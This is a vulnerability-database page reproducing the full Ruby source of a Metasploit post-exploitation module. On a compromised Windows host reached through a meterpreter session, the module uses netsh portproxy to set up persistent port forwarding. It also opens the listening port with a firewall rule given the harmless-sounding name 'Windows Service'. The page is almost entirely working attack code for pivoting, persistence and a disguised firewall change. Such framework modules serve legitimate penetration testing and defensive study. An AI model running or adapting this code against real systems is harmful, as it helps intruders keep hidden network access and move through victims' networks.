Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Windows Manage Set Port Forwarding With PortProxy

🗓️ 26 Aug 2013 12:44:41Reported by Borja Merino <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 50 Views

Windows module for persistent port forwarding via PortProx

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Priv

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Set Port Forwarding With PortProxy',
        'Description' => %q{
          This module uses the PortProxy interface from netsh to set up
          port forwarding persistently (even after reboot). PortProxy
          supports TCP IPv4 and IPv6 connections.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
        'Platform' => 'win',
        'SessionTypes' => [ 'meterpreter' ]
      )
    )

    register_options(
      [
        OptAddress.new('LOCAL_ADDRESS', [ true, 'IPv4/IPv6 address to which to listen.']),
        OptAddress.new('CONNECT_ADDRESS', [ true, 'IPv4/IPv6 address to which to connect.']),
        OptPort.new('CONNECT_PORT', [ true, 'Port number to which to connect.']),
        OptPort.new('LOCAL_PORT', [ true, 'Port number to which to listen.']),
        OptBool.new('IPV6_XP', [ true, 'Install IPv6 on Windows XP (needed for v4tov4).', true]),
        OptEnum.new('TYPE', [ true, 'Type of forwarding', 'v4tov4', ['v4tov4', 'v6tov6', 'v6tov4', 'v4tov6']])
      ]
    )
  end

  def run
    if !is_admin?
      print_error("You don't have enough privileges. Try getsystem.")
      return
    end

    # Due to a bug in Windows XP you need to install IPv6
    # http://support.microsoft.com/kb/555744/en-us
    version = get_version_info
    if version.build_number.between?(Msf::WindowsVersion::XP_SP0, Msf::WindowsVersion::XP_SP2) && !check_ipv6
      return
    end

    return unless enable_portproxy

    fw_enable_ports
  end

  def enable_portproxy
    rtable = Rex::Text::Table.new(
      'Header' => 'Port Forwarding Table',
      'Indent' => 3,
      'Columns' => ['LOCAL IP', 'LOCAL PORT', 'REMOTE IP', 'REMOTE PORT']
    )

    print_status('Setting PortProxy ...')
    netsh_args = 'interface portproxy '
    netsh_args << "add #{datastore['TYPE']} "
    netsh_args << "listenport=#{datastore['LOCAL_PORT']} "
    netsh_args << "listenaddress=#{datastore['LOCAL_ADDRESS']} "
    netsh_args << "connectport=#{datastore['CONNECT_PORT']} "
    netsh_args << "connectaddress=#{datastore['CONNECT_ADDRESS']}"
    output = cmd_exec('netsh', netsh_args)
    if output.size > 2
      print_error('Setup error. Verify parameters and syntax.')
      return false
    else
      print_good('PortProxy added.')
    end

    output = cmd_exec('netsh', 'interface portproxy show all')
    output.each_line do |l|
      rtable << l.split(' ') if l.strip =~ /^[0-9]|\*/
    end
    print_status(rtable.to_s)
    return true
  end

  def ipv6_installed
    output = cmd_exec('netsh', 'interface ipv6 show interface')
    if output.lines.count > 2
      return true
    else
      return false
    end
  end

  def check_ipv6
    if ipv6_installed
      print_status('IPv6 is already installed.')
      return true
    elsif !datastore['IPV6_XP']
      print_error('IPv6 is not installed. You need IPv6 to use portproxy.')
      print_status('IPv6 can be installed with "netsh interface ipv6 install"')
      return false
    else
      print_status('Installing IPv6... can take a little long')
      cmd_exec('netsh', 'interface ipv6 install', 120)
      if !ipv6_installed
        print_error('IPv6 was not successfully installed. Run it again.')
        return false
      end
      print_good('IPv6 was successfully installed.')
      return true
    end
  end

  def fw_enable_ports
    print_status("Setting port #{datastore['LOCAL_PORT']} in Windows Firewall ...")
    version = get_version_info
    if version.build_number >= Msf::WindowsVersion::Vista_SP0
      cmd_exec('netsh', "advfirewall firewall add rule name=\"Windows Service\" dir=in protocol=TCP action=allow localport=\"#{datastore['LOCAL_PORT']}\"")
    else
      cmd_exec('netsh', "firewall set portopening protocol=TCP port=\"#{datastore['LOCAL_PORT']}\"")
    end
    output = cmd_exec('netsh', 'firewall show state')

    if output =~ /^#{datastore['LOCAL_PORT']} /
      print_good('Port opened in Windows Firewall.')
    else
      print_error('There was an error enabling the port.')
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 May 2023 04:36Current
7High risk
Vulners AI Score7
windowsport forwardingnetshfirewall
50